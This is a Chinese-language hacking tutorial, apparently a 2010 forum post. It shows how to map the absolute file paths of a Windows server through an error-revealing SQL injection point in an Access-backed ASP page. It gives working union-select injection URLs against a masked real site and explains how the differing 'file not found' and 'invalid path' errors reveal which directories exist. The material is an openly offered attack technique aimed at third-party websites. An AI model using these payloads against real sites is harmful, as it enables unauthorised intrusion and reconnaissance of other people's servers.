【我们一起踏上攻防的征途】―第三课 用access 注入点猜绝对路径

注：本文同时在51cto论坛―》黑客攻防板块同步更新 ！

 

元旦期间在家无聊，看了一下某人关于猜绝对路径的文章，觉得不怎么好，他的太麻烦了。现在我来弄一个简单点的，哈哈，希望大家喜欢！

这里我分享的办法有点类似access跨库查询 我们只要在旁站中、找到一个  显错模式的 access的注入点就OK了。

5f5b14d0ca95acdcae8667a0844b6f5f.jpg (9 KB)

2010-1-5 13:34

如上图就是暴错模式的 access的注入点。 现在我们随便找了个 access的注如点： http://****.net/en/ShowNews.asp?id=12  

http://****.net/en/ShowNews.asp?id=-12+union+select+*+from+admin

5.jpg (15.65 KB)

2010-1-6 12:58

当我们在后面加个   .c  看看  

http://****.net/en/ShowNews.asp?id=-12+union+select+*+from+admin.c

4.jpg (15.46 KB)

2010-1-6 12:48

关键就是这里的错误提示。  
找不到文件 'c:\windows\system32\inetsrv\admin.mdb'。

提示找不到文件。  那么也就是说。这个目录 c:\windows\system32\inetsrv\ 是存在的。   

那么我们继续。  
http://****.net/en/ShowNews.asp?id=-12+union+select+*+from+c:\admin.c

3.jpg (12.42 KB)

2010-1-6 12:48

注意下。   找不到文件 'c:\admin.mdb'。      也就是说 。 c:\盘是存在的。

好了。现在我们继续。  

http://****.net/en/ShowNews.asp?id=-12+union+select+*+from+c:\ajsdhakjhwkjdh\admin.c

2.jpg (13.68 KB)

2010-1-6 12:48

注意现在的错误。  
'c:\ajsdhakjhwkjdh\admin.mdb' 不是一个有效的路径。 确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。
那么。 我们可以通过这个来猜 。  目标站的路径